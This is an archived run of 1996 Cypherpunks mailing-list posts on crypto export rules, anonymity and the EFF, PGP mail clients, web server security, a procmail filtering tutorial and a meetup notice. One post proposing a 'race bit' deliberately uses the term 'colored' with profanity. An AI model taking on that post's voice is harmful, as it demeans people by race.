Message-ID: <199609041610.JAA17207@netcom22.netcom.com>

There are two difficult ways to tell how to Cgi your page against
http://www.anonymizer.com:8080/{*}

Either ask Rich Graves for the details on how he did it with
http://www.stanford.edu/{*}

or

Use a decent browser client with 100% debugging mode,
{and|or}
telnet://www.stanford.edu:80/{*}
{and|or}
telnet://www.anonymous.com:8080/http://www.stanford.edu/{*}
and enter a telnet script to find out how he did it.

BTW, how to do telnet scripting and data transfers between two
remote hosts with standard telnet clients available for Unice shells?
It's ridiculous to have to sz to my local machine before sz to my
remote account if I simply want to transfer a file between two
remote hosts! Yes, I'm aware of the mail utility, I mean telnet.

From 72124.3234 at compuserve.com Wed Sep 4 12:52:11 1996
From: 72124.3234 at compuserve.com (Kent Briggs)
Date: Thu, 5 Sep 1996 03:52:11 +0800
Subject: rc2 export limits..
Message-ID: <199609041606.MAA20510@spirit.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

stewarts at ix.netcom.com wrote:

> However, the usual guidelines for systems like RC2 and RC4 is
> 40-bit keys, and RSA keys up to 512 bits for encrypting
> session keys and 1024 bits for signatures

Can you list a source for the 1024-bit signature restriction? I know
about the 40-bit RC2/RC4 and 512-bit public encryption keys because they
are specifically addressed in the State Dept's "Procedure for Submitting
a Commodity Jurisdiction Request for a Mass Market Software Product that
Contains Encryption". However, digital signatures are not mentioned in
this procedure. I can't imagine what justification could be used to
restrict the strength of digital signatures.

Kent

- ------------------------------------------------------------
Puffer & CryptaPix available from http://execpc.com/~kbriggs
- ------------------------------------------------------------

- ---
[This message has been signed by an auto-signing service. A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMi2o9SoZzwIn1bdtAQEBoAF+PjxvtAuPUnlMr9UGoIYhjgjPQ0Bs0GeE
5077GFz/pASkMfFvsh5uO6I9BBtpGMpI
=P92s
-----END PGP SIGNATURE-----

From alano at teleport.com Wed Sep 4 12:55:19 1996
From: alano at teleport.com (Alan Olsen)
Date: Thu, 5 Sep 1996 03:55:19 +0800
Subject: Mail OnNet
Message-ID: <3.0b11.32.19960904090523.010d81e8@mail.teleport.com>

At 05:10 PM 8/31/96 -0700, Joel McNamara wrote:
>In my never-ending search for the perfect PGP e-mail client, I just stumbled
>on to a beta of a product put out by FTP Software called Mail OnNet. Unlike
>the Pronto Secure and Pegasus, this client actually has PGP code (licensed
>from PGP Inc.) built directly in. No shelling out to DOS!

It is very nice. It is a bit on the hard side to get. (Took me three tries.
It seems to time out the transfer if it is not completed within a certain
time frame. I guess that is what I get for trying to download all three
parts at the same time.)

It does have the beta nature however. I have found a couple of problems with
the program that make it so that I will not use it beyond testing. The
people at FTP have been very responsive to e-mail, so I expect the problems
to be fixed soon. They also seem to have no idea as to what it will retail
for. With proper marketing, Eudora could be in real trouble.

>Very nice interface and almost complete idiot-proof
>encrypting/decrypting/signing. Extremely powerful rules based processing too.
The interface design is very clean. (It is nice seeing well designed dialog boxes in a product. I have been using too much shareware lately I guess...) The rules processing looks to be very powerful. (Puts Eudora 3.0 to shame.) >Check out: > >http://www.ftp.com/mkt_info/onnet32/try.htm > >IMHO, this is getting very close to transparent secure e-mail for the masses. Now all they need is a remailer interface. >Two notes. (1) It only runs under Win95 and NT. (2) It's ITAR restricted. (3) It is bigger than a battleship. The distribution is just shy of 10 megs. Installed it is supposed to be about 45 megs. (In perspective, a full install of Visual Basic 4.0 "Professional" is about 50 megs.) --- Alan Olsen -- alano at teleport.com -- Contract Web Design & Instruction `finger -l alano at teleport.com` for PGP 2.6.2 key http://www.teleport.com/~alano/ "We had to destroy the Internet in order to save it." - Sen. Exon "Microsoft -- Nothing but NT promises." From jf_avon at citenet.net Wed Sep 4 13:20:04 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 5 Sep 1996 04:20:04 +0800 Subject: Letter to the Observer [re: Internet paedophile] Message-ID: <9609041639.AA25461@cti02.citenet.net> On 4 Sep 96 at 5:41, Martin Minow wrote: > Forwarded to me by a friend: > The following letters were delivered to the Editor of the Observer > last week as a request to publish a retraction of their article > relating to the Internet that appeared on Sunday 25th. August. One way to limit or retaliate against diffamation would be to refuse internet access to anybody known to be part of any such medias, being tv or paper. ISPs would probably easily agree since the revenues coming from journalists vs from the general population is probably minuscule. Of course, the conventionnal media would set up their own ISP but they could be identified. Does that makes sense or am I out to lunch? 
jfa Jean-Francois Avon DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal JFA Technologies, R&D consultants: physicists, technologists and engineers. PGP keys at: http://w3.citenet.net/users/jf_avon ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 From jf_avon at citenet.net Wed Sep 4 13:27:31 1996 From: jf_avon at citenet.net (Jean-Francois Avon) Date: Thu, 5 Sep 1996 04:27:31 +0800 Subject: [troll] Re: Workers of the Web, UNITE! Message-ID: <9609041643.AA25642@cti02.citenet.net> On 4 Sep 96 at 6:38, Martin Minow wrote: > >Tired: Libertarian cypherpunks > >Wired: Crypto-socialists > > > The Wobblies are a prime example of Tom Leherer's comment: > "They won all of the battles, but we had all the good songs." > Up the Revolution. > Martin (crypto social democrat) Minow? What is a missing "n" on the net? Everybody makes typos nowadays... Minow? Sound like a little living thing used as a lure on a troll, isn't it? jfa From tcmay at got.net Wed Sep 4 13:32:26 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 04:32:26 +0800 Subject: Race Bit: C Message-ID: At 3:02 AM 9/4/96, James A. Donald wrote: >At 10:33 PM 9/3/96 -0800, jim bell wrote: >>>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>>use of encryption to thwart a law-enforcement investigation illegal." I >>>immediately pointed out that while this wouldn't make _encrypted_ remailers >>>illegal, per se, effectively it would because the moment an investigation >>>(even a phony or trumped-up one) is started and is "thwarted" by the >>>encryption used, the remailer operator became guilty of a crime. ... >I believe that judges have a policy of interpreting deliberately >ambiguous statutes in whatever way makes the most sense. The only >sensible interpretation of Leahy's bill is that it criminalizes >strong remailers, that it is intended to punish ANYONE, not just >the criminals themselves, who obstructs investigations. 
As the recent discussion of knives, switchblades, and throwing stars showed, such ambiguous laws are often used to keep the coloreds down. But how will cops and local prosecutors know which users of remailers are colored? Answer: the race bit must be set on all posts. --Klaus (P.S. More than one of you has expressed anger to me that I am using the term "colored." As in "what the coloreds are doing." I use this term deliberately, because the perfectly fine term "black" is now being replaced by the ultra-awkward and stupid-sounding "person of color." We have even seen this in posts to this list. Here in Santa Cruz, the terms in use are: people of color, students of color, lesbians of color, etc. Only about 17.32% of the entire population is _not_ "persons of color." I say, "Fuck it...they want to be called "colored," then, fine, they're "colored."") We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From snow at smoke.suba.com Wed Sep 4 13:40:58 1996 From: snow at smoke.suba.com (snow) Date: Thu, 5 Sep 1996 04:40:58 +0800 Subject: Moscowchannel.com hack In-Reply-To: <199609031548.KAA04410@shade.sctc.com> Message-ID: On Tue, 3 Sep 1996, Rick Smith wrote: > : On Sat, 31 Aug 1996, Joel McNamara wrote: > : > Just a matter of time before some builds a dedicated Satan type tool that > : > scans for HTTP server holes or messed up file permissions to make locating > : > potential victims easy. > Snow replied: > : Write your web site to a CD-ROM and hard-code the base directory into the > : webserver. 
> Or host it on something with mandatory access control protections. > There are still a handful of us building such things, and they can > give really good protection to web page contents. Could you illuminate me on this subject please? I am working with a potential client who may need a fairly secure web server. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From jimbell at pacifier.com Wed Sep 4 13:46:19 1996 From: jimbell at pacifier.com (jim bell) Date: Thu, 5 Sep 1996 04:46:19 +0800 Subject: What is the EFF doing exactly? Message-ID: <199609041702.KAA15781@mail.pacifier.com> At 08:02 PM 9/3/96 -0700, James A. Donald wrote: >At 10:33 PM 9/3/96 -0800, jim bell wrote: >>>The Leahy crypto bill introduced early this year made (paraphrasing) "the >>>use of encryption to thwart a law-enforcement investigation illegal." I >>>immediately pointed out that while this wouldn't make _encrypted_ remailers >>>illegal, per se, effectively it would because the moment an investigation >>>(even a phony or trumped-up one) is started and is "thwarted" by the >>>encryption used, the remailer operator became guilty of a crime. > >At 07:10 AM 9/4/96 -0500, Jon Lebkowsky wrote: >> Is that true? Or is it that the individual user would be guilty of a crime? > >Since the individual user would already be guilty of a crime, if he is >using the remailer to conceal his crimes, the paragraph in question would >be fairly useless and irrelevant unless it had the meaning that Jim Bell >attributes to it. > >I believe that judges have a policy of interpreting deliberately >ambiguous statutes in whatever way makes the most sense. The only >sensible interpretation of Leahy's bill is that it criminalizes >strong remailers, that it is intended to punish ANYONE, not just >the criminals themselves, who obstructs investigations. Moreover, this "spreading the responsibility" philosophy ties in with the recent practices (both in the civil and criminal areas) of passing blame around. 
In civil areas, it's called "deep pockets." In the criminal area, you
occasionally see news items about laws making parents criminally liable for
the actions of their children.

Why WOULDN'T the police want to shut down anonymous remailers? The Leahy
bill clearly didn't distinguish between remailer operators and users, so it
is no leap to conclude that they would be treated similarly.

Jim Bell
jimbell at pacifier.com

From jfricker at vertexgroup.com Wed Sep 4 13:48:51 1996
From: jfricker at vertexgroup.com (John F. Fricker)
Date: Thu, 5 Sep 1996 04:48:51 +0800
Subject: 2^1,257,787-1
Message-ID: <2.2.32.19960904165452.006dd000@vertexgroup.com>

Ok so maybe here in Organ we are a little behind the times but I just heard
about this 378,632 digit prime. Grab your HP11C's and crank out
2^1,257,787-1 courtesy of David Slowinski at Cray.

From nosferat at atcon.com Wed Sep 4 14:35:10 1996
From: nosferat at atcon.com (Stephen Charchuk)
Date: Thu, 5 Sep 1996 05:35:10 +0800
Subject: No Subject
Message-ID:

From declan at eff.org Wed Sep 4 14:56:34 1996
From: declan at eff.org (Declan McCullagh)
Date: Thu, 5 Sep 1996 05:56:34 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960904115249.006b6580@mail.well.com>
Message-ID:

Harassment in person when someone is shouting at you in the street,
spittle flying in your face, is one thing.

Online "harassment," I believe, is a problem that can be solved with
technical means. Don't like someone? Killfile them.

-Declan

On Wed, 4 Sep 1996, Jon Lebkowsky wrote:

> At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
> >At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
> >> Not necessarily. The character of the anonymous speech is decisive. If you
> >> use anonymity to cloak harassment, for instance, the anonymity (which
> >> removes accountability) is a problem. The accountability issue is real and
> >> should be addressed, not evaded.
> >
> >No: The harassment is the problem, not the anonymity that makes it
> >possible.
>
> The harassment is one problem, the lack of accountability another. Which is
> not to say that 'lack of accountability' should be 'fixed' by some sort of
> blanket restriction...but it should be acknowledged as a problem.
>
> --
> Jon Lebkowsky FAX (512)444-2693 http://www.well.com/~jonl
> Electronic Frontiers Forum, 6PM PDT Thursdays
> "No politician can sit on a hot issue if you make it hot enough."--Saul Alinsky
>

// declan at eff.org // I do not represent the EFF // declan at well.com //

From paul at fatmans.demon.co.uk Wed Sep 4 15:10:06 1996
From: paul at fatmans.demon.co.uk (paul at fatmans.demon.co.uk)
Date: Thu, 5 Sep 1996 06:10:06 +0800
Subject: (Fwd) Re: Secure anonymouse server protocol: comments please
Message-ID: <841849157.2629.0@fatmans.demon.co.uk>

------- Forwarded Message Follows -------
From: Adamsc at io-online.com (Adamsc)
To: "paul at fatmans.demon.co.uk"

On Mon, 2 Sep 1996 19:24:23 +0000, paul at fatmans.demon.co.uk wrote:

>This system has 1 huge fault, we can encrypt a users ID with the
>servers public key to see what his ID in the encrypted database is
>and therefore identify him, maybe we need two separate server public
>keys, and when IDs come in encrypted with key1 (the one it releases)
>it decrypts with secretkey1 then encrypts with publickey2 (the one it
>keeps secret)
>or maybe we can just hash and sign the IDs in the database?
>as I said it`s very sketchy, I made most of this up as I wrote it so
>if you must tear it to pieces please do so constructively, it could
>be the route to a secure system....

How about this: do the exchange *every* time. Never reuse a key. That way
at most 1 message could be easily snagged (by seeing where it goes). It'd be
processor intensive, but it avoids the whole reuse problem - where you store
an ID to be used to retrieve all messages. Also, software could be written
to do the key computation solely on the client - after all, the server
doesn't care if they pass themselves a dud key, right? Let them crunch it.
Put all those Pentiums to work!

...

Better idea, I hadn`t thought of that, anyone else care to comment on
a way to solve this? - how did the nymservers do it????

Datacomms Technologies web authoring and data security
Paul Bradley, Paul at fatmans.demon.co.uk
Http://www.fatmans.demon.co.uk/crypt/
"Don`t forget to mount a scratch monkey"

From tcmay at got.net Wed Sep 4 15:10:19 1996
From: tcmay at got.net (Timothy C. May)
Date: Thu, 5 Sep 1996 06:10:19 +0800
Subject: What is the EFF doing exactly?
Message-ID:

At 11:52 AM 9/4/96, Jon Lebkowsky wrote:
>At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>>> Not necessarily. The character of the anonymous speech is decisive. If you
>>> use anonymity to cloak harassment, for instance, the anonymity (which
>>> removes accountability) is a problem. The accountability issue is real and
>>> should be addressed, not evaded.
>>
>>No: The harassment is the problem, not the anonymity that makes it
>>possible.
>
>The harassment is one problem, the lack of accountability another. Which is
>not to say that 'lack of accountability' should be 'fixed' by some sort of
>blanket restriction...but it should be acknowledged as a problem.

It has been. In many hundreds of articles addressing aspects of the issue.

The fact that Esther Dyson and others think advocates of the right to be
anonymous claim that these issues are not being considered just shows that
Esther and others are not aware of these many articles.
Nor can every brief post--such as the one James Donald made above--include a fully-nuanced, fully-balanced discussion of all issues. Saying that an advocate for a position has not considered the alternate positions is usually incorrect. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From tcmay at got.net Wed Sep 4 15:15:29 1996 From: tcmay at got.net (Timothy C. May) Date: Thu, 5 Sep 1996 06:15:29 +0800 Subject: 2^1,257,787-1 Message-ID: At 4:54 PM 9/4/96, John F. Fricker wrote: >Ok so maybe here in Organ we are a little behind the times but I just heard >about this 378,632 digit prime. Grab your HP11C's and crank out >2^1,257,787-1 courtesy of David Slowinski at Cray. The news sites on the Web I looked at had the announcement, but not the number. Thanks. I've already modified my .sig. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." 

From janzen at idacom.hp.com Wed Sep 4 15:17:58 1996
From: janzen at idacom.hp.com (Martin Janzen)
Date: Thu, 5 Sep 1996 06:17:58 +0800
Subject: How to use procmail
Message-ID: <9609041821.AA27906@sabel.idacom.hp.com>

"Damaged Justice" writes:
> Would some kind soul out there be willing to instruct a novice in the
> mysteries of procmail? I've finally decided to start killfiling my mail
> as well as my news.

A fine idea. Procmail makes the Cypherpunks list infinitely more readable.

1) First, here's how to get it:

----------------------
A recent version can be picked up at various comp.sources.misc archives.
The latest version can be obtained directly from the ftp-archive at:

        amaru.informatik.rwth-aachen.de (137.226.112.31)

        as compressed tar file:         pub/unix/procmail.tar.Z   <100KB
        or in compressed shar format:   pub/unix/procmail.0?.Z
----------------------

2) Build the procmail program and install it in a suitable location.
I have no idea what your familiarity with UNIX and C is; you may want
to have your sysadmin help you with this. Alternatively, you could
use Alta Vista or equivalent to search for binaries for your system.

3) Create a file of procmail "recipes", which tell it how to process
your mail. This file is called "$HOME/.procmailrc". Mine begins like
this; fix up directory names as needed for your system:

-----------------------
#
# $HOME/.procmailrc - procmail recipe file
#
PATH=/usr/local/bin:/usr/ucb:/bin:/usr/bin:$HOME/bin/700o:$HOME/bin
ME=             janzen
HOME=           /Home/$ME
LOGFILE=        $HOME/.procmaillog
MAILDIR=        $HOME/Mail
ORGMAIL=        /usr/mail/$ME
DEFAULT=        $ORGMAIL
TMP=            $HOME/tmp
SENDMAIL=       /usr/lib/sendmail
TMPFILE=        $TMP/procmail.$$
LOCKFILE=       $HOME/Mail/.procmail

# toss out junk mail
:1
^Subject:.*unsubscribe
/dev/null

# sort mail from mailing lists into the proper folders
:1
cypherpunks
Cypherpunks
-----------------------

The last part sorts all mail whose header contains the word "cypherpunks"
into the folder $MAILDIR/Cypherpunks.

Now the fun part -- writing your "recipes"! You can get as specific
as you want:

-----------------------
# kill a particular thread
:2
^To:.*cypherpunks@toad.com
^Subject:.*Workers of the
/dev/null

# ignore a particular user
:2
cypherpunks
patrickbc@juno.com
/dev/null

# I haven't tried this one, but any subject with too many consecutive
# capitals is probably spam or worse. Separate it out, but don't toss
# it just yet.
# (D flag: match case-sensitively; without it procmail ignores case and
# [A-Z] would match any six consecutive letters.)
:2D
cypherpunks
^Subject:.*[A-Z][A-Z][A-Z][A-Z][A-Z][A-Z]
ProbableSpam

# search the whole message body, not just the headers, for probable spam
:1HB
^dear friend
ProbableSpam

# put everything else in the incoming Cypherpunks mail folder
:1
^To:.*cypherpunks@toad.com
NewCypherpunksMail
-----------------------

Rules are evaluated in top-to-bottom order; first matching rule wins.
Anything not matched ends up in your usual $ORGMAIL folder.

4) Run your incoming mail through procmail. To do this, most Unix systems
let you create a file called "$HOME/.forward" with the following contents
(including the quotes):

        "| IFS=' '; /usr/local/bin/procmail -p"

(Replace "/usr/local/bin" with the directory in which you installed
procmail.)

5) One thing to watch out for: procmail is executed on the machine which
handles your mail. If this machine has a different architecture than
your own machine, you must build procmail for the mail handling machine,
not your own.

Also, the permissions on your $HOME/.forward and $HOME/.procmailrc files
must be set so that they are readable on the mail handling machine. If
your home directory is NFS-mounted, this should happen automatically;
otherwise, you may need to copy them to the mail handling machine manually.
Finally, the procmail process may not have your userid, so you must make
these files world-readable:

        chmod 644 $HOME/.forward $HOME/.procmailrc

For the first day or two, check your $HOME/.procmaillog file frequently
to see whether there are any problems. Check with your sysadmin to make
sure that your mail isn't ending up "all over the floor". Send yourself
mail to test "recipes".

6) Once it's running smoothly, you can get fancy and run the following
shell script, which reads the $HOME/.procmaillog file and produces a nice
summary, sorted by mail folder:

-------------------------------------------------------------------------------
#!/bin/sh
# Summarize the ~/.procmaillog file

LOGFILE=${LOGFILE:=$HOME/.procmaillog}

echo "Subject: Procmail Summary"
echo " "

# Each delivery is logged as an indented "Folder: <name> <bytes>" line;
# count messages and add up bytes per folder.
sort "${LOGFILE}" | /usr/bin/awk '
/^ *Folder:/ {
        folder = $2;
        nbytes = $3;
        msgcount[folder] += 1;
        totalbytes[folder] += nbytes;
}
END {
        for (folder in msgcount)
                printf "Folder %s:\tsaved %d messages (%d bytes)\n", \
                        folder, msgcount[folder], totalbytes[folder];
}
'

# With -clear, start a fresh log after reporting.
if [ "$1" = "-clear" ]; then
        rm -f "$LOGFILE";
fi
-------------------------------------------------------------------------------

To arrange to have it run daily, I use the following crontab entry:

0 7 * * * /Home/janzen/bin/pmsumm.sh -clear | elm -s "Procmail Summary" janzen

which means, "At 7:00AM every morning, run the pmsumm.sh script, use the Elm
mailer to mail the output to me, and then clear $HOME/.procmaillog". See the
"cron" man page for your system, and/or talk to your sysadmin, since this
varies among different flavors of Unix.

Hope this helps...

--
Martin Janzen janzen at idacom.hp.com

From vznuri at netcom.com Wed Sep 4 15:25:37 1996
From: vznuri at netcom.com (Vladimir Z. Nuri)
Date: Thu, 5 Sep 1996 06:25:37 +0800
Subject: What is the EFF doing exactly?
In-Reply-To: <199609040057.RAA01205@mail.pacifier.com>
Message-ID: <199609041827.LAA29523@netcom20.netcom.com>

jim bell
>"Addressed", maybe, but that doesn't necessarily mean, "solved." For many
>decades, people have been able to walk up to a pay telephone at 3:00 AM and
>make a harassing phone call to somebody, a "problem" which still exists and
>no solution is being implemented for.

amusing the way you phrase that-- you didn't say, "phone", but "pay phone". the statement used to hold in general for all "phones", but then caller id, caller blocking, etc. have been introduced that make this no longer true. so in a very real sense, anonymity in the phone system was considered a "problem" by some that has been "solved" or "modified" by some recent advancements. (yes, most people agree caller ID is an advancement). I think cpunks should hold the view that communication is a matter of mutual consent between sender and receiver. if a receiver says, "I don't want any anonymous messages", then should be able to block them. this is essentially what is happening with the remailers *right*now*, if you ask any remailer operator. people ask not to receive anonymous mail, and are put on the blocking lists. imho only the extremists are arguing, and have always argued, that they should have some ability to put an anonymous message in front of someone else against their will. this basic rule becomes more murky when you look at public forums, because you can't really say whether given individuals reading them want to hear something anonymous or not. by designing the forum beforehand to force the situation, you solve this problem. I do believe that in the future there will be all types of forums: those in which identity is required, those in which it is optional, and those in which it is always cloaked. this is eminently reasonable imho. those who argue against one of the above's existence (such as saying it involves a ghettoization of anonymity, that there should always be an ability to be anonymous in any communication setting) are extremists imho. the above is almost exactly what Dyson was saying, and I have been advocating this position for a long time. again, I think anyone who rejects the above is an extremist. there are different ways to support or restrict anonymity, some of them extremist. 
those who argue for no restrictions anywhere don't have a clue about reality imho. From smith at sctc.com Wed Sep 4 15:36:01 1996 From: smith at sctc.com (Rick Smith) Date: Thu, 5 Sep 1996 06:36:01 +0800 Subject: Protecting Web servers (was: Moscowchannel.com hack) Message-ID: > Could you illuminate me on this subject please? I am working with a >potential client who may need a fairly secure web server. Years ago, the government published some criteria for highly secure systems, notably the TCSEC or "Orange Book," which described requirements for protecting classified information on a timesharing system with uncleared users. Several vendors managed to build such systems, though very few were judged secure enough to really protect classified data from uncleared users. However, the underlying mechanisms of "mandatory access control" do manage to block a range of sophisticated attacks against the host computer. These are the systems given the various B and A ratings: B1, B2, B3, A1 (in ascending order of security). Also-ran systems that can keep honest people from tripping over one another were given "C" ratings, though "C2" is all you see any more. A few vendors are putting Web servers and such on systems with mandatory protection. I've heard talk of it from SecureWare, HP, Harris, and AT&T using B1 or B1-like systems. Pardon the plug, but our Sidewinder also hosts a protected Web server and uses mandatory protection to prevent Internet attacks from damaging it. In practice, I've found that most customers just want to demonstrate "due diligence" regarding security. They pick up whatever's popular in the marketplace that has some pretention of strong security ("We're C2 rated by the government!!"). It's a rare customer that actually takes the time to look at the security issues and consider whether they might need what mandatory protection provides. Rick. 
smith at sctc.com secure computing corporation From vznuri at netcom.com Wed Sep 4 15:43:35 1996 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Thu, 5 Sep 1996 06:43:35 +0800 Subject: flimflamery on anonymity In-Reply-To: <199609041557.IAA00970@dns1.noc.best.net> Message-ID: <199609041839.LAA00713@netcom20.netcom.com> james donald: >Lucky Green and Dark Unicorn are not accountable. This is a problem? > Because it is a problem "We" need to do something about it, (last line is sarcasm for the sarcasm impaired) a cpunk position I have seen repeated often. it goes along a very simplistic line of reasoning that I have seen TCM evoke repeatedly. it rather annoys me. it goes like this: cyberspace is merely discussion between people. anonymity should be allowed anywhere there are discussions (its a free speech issue). therefore it should be possible everywhere in cyberspace. this idea lacks a lot of subtlety in thought and to my mind is tremendously simplistic. first, it suggests that cyberspace as we now see it is the way it will always be. but that is ridiculous. what we have today in cyberspace is something like a sophomoric debate society. it's gradually increasing in professionalism with the rise of web sites etc. cyberspace is going to grow to become a lot more than a debate society, and is in this progress right now. whenever challenged on anonymity in certain contexts, the extremist cpunk position is to blur the issue into one of free speech. but the issue is much different if we are talking about a professional situation. scientists demand that each other be "accountable" for their work, for example, and pseudonymous publication simply would not be acceptable. cpunks will also argue that anonymity can suffice for any business transaction. that may be so, but what about a business that simply says, "we choose to require identity among our customers, and you can go elsewhere if you disagree". 
the extremist cypherpunks would be in a quandary over this example, because they think they can support anarchocapitalist freedom and anonymity at the same time. they will argue that such a business will one day not exist. but shouldn't a business be free to make this decision? rabid cpunks would probably argue against such a decision. cyberspace as a whole is *not* going to lead to a total motion away from physical identity. in some ways physical identity will be more strictly enforced in cyberspace, in "some regions". there will be other regions of cyberspace in which "anything goes". anyway, I want to emphasize my main point, that *anonymity* is not merely about debate societies. it's about human interaction. any time two or more humans interact in a host of ways that go beyond communication (such as business transactions, professional societies, etc) it's going far beyond mere speech. of course in the cpunk mailing list, who cares if there are anonymous/pseudonymous participants? but using this as a metaphor for anonymity in general shows a pathetic lack of sophistication in thinking, imho. there is nothing at stake here on this mailing list except reputations and egos. but far more is at stake in the "real world" and the risks posed by anonymity will be adequately diluted because of this. and it won't be by people who are all "f***ing statists"-- it will be by reasonable people such as those who head EFF, who are interested in a civilized society. "cryptoanarchy"--? if what is being connoted by this is no one knowing anyone else's true identity-- sure, in places, if you go looking for them. but it will be the invisible underside, not the mainstream of society. 
From unicorn at schloss.li Wed Sep 4 16:03:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 07:03:02 +0800 Subject: EFF chairwoman: Anonymity proven not to be a positive factor In-Reply-To: Message-ID: On Mon, 2 Sep 1996, Ulf Moeller wrote: > >From a Scientology magazine: > > Esther Dyson, member of the board of directors of the Electronic > Frontier Foundation and member of the National Information > Infrastructure Advisory Council, spoke on the anonymity issue at the > fifth Computers, Freedom & Privacy (CFP) conference in San Francisco. > > [...] > "I have a concern about the spread > of bad behavior on the Net," said Dyson. "Anonymity figures into this, > and I feel that it has proven to not be a positive factor. It breaks > down the community which we are seeking to build, and cout protection > and privacy laws already exist and should be applied in a broad way, > such that they are transparent to new wrinkles in the technology. It > is not necessary to view the world of the Net as different from the > rest of the world." I think EFF needs to make attempts to clear up this mess. 
> > http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm > > > [For EFF's former position on anonymity, see > http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity] > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From james at corp.netcom.net.uk Wed Sep 4 16:28:39 1996 From: james at corp.netcom.net.uk (James Fidell) Date: Thu, 5 Sep 1996 07:28:39 +0800 Subject: Letter to the Observer [re: Internet paedophile] In-Reply-To: <9609041639.AA25461@cti02.citenet.net> Message-ID: <199609041954.UAA04906@corp.netcom.net.uk> Jean-Francois Avon wrote: > On 4 Sep 96 at 5:41, Martin Minow wrote: > > > Forwarded to me by a friend: > > > The following letters were delivered to the Editor of the Observer > > last week as a request to publish a retraction of their article > > relating to the Internet that appeared on Sunday 25th. August. > > One way to limit or retaliate against defamation would be to refuse > internet access to anybody known to be part of any such medias, being > tv or paper. > > ISPs would probably easily agree since the revenues coming from > journalists vs from the general population is probably minuscule. Of > course, the conventional media would set up their own ISP but they > could be identified. > > Does that make sense or am I out to lunch? I don't think it makes sense. The media would be the first to point the finger at the ISPs for censorship in such a case, one imagines (whether it could be justified or not is a different matter of course). James. -- "Yield to temptation -- | Work: james at corp.netcom.net.uk it may not pass your way again" | Play: james at hermione.demon.co.uk | http://www.netcom.net.uk/~james/ - Lazarus Long | James Fidell From unicorn at schloss.li Wed Sep 4 16:33:26 1996 From: unicorn at schloss.li (Black Unicorn) Date: Thu, 5 Sep 1996 07:33:26 +0800 Subject: What is the EFF doing exactly? 
In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com> Message-ID: On Tue, 3 Sep 1996, Jon Lebkowsky wrote: > "Uncompromising" is not an "element of legislative influence," at least not > on this planet. Explain that to the tobacco lobby. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From claborne at CYBERTHOUGHT.com Wed Sep 4 16:38:18 1996 From: claborne at CYBERTHOUGHT.com (Christian Claborne) Date: Thu, 5 Sep 1996 07:38:18 +0800 Subject: San Diego CPunk Physical meeting this Thursday Message-ID: <2.2.32.19960904195619.002c4b20@cyberthought.com> -----BEGIN PGP SIGNED MESSAGE----- <<<<< NOTE! I have a new address!!! >>>>>> This Thursday!!! San Diego Area CPUNKS symposium Thursday, Sep. 5, 1996. Invitation to all Cypherpunks to join the San Diego crowd at "The Mission Cafe & Coffee Shop". We discuss cryptography and other related subjects, have the special cypherpunk dinner, and unwind after a long day at the grind stone. Don't forget to bring your public key fingerprint. If you can figure out how to get it on the back of a business card, that would be cool. If you want the suspicious crowd there to sign your key, bring two forms of ID. Hopefully Lance Cottrell will give us an update on Mixmaster and what's going on at San Diego's best ISP. You can also get the scoop on why I resigned from NCR. It wouldn't of course be because someone freaked out when I forwarded the cypherpunk e-mail titled "How to become in international Arms trafficker"... Place: The Mission Cafe & Coffee Shop 3795 Mission Bl in Mission Beach. 488-9060 Time:1800 Their Directions: 8 west to Mission Beach Ingram Exit Take west mission bay drive Go right on Mission Blvd. On the corner of San Jose and mission blvd. It is located between roller coaster and garnett. It's kind of 40s looking building... funky looking (their description, not mine) They serve stuff to eat, coffee stuff, and beer. See you there! New guy, bring your fingerprint. 
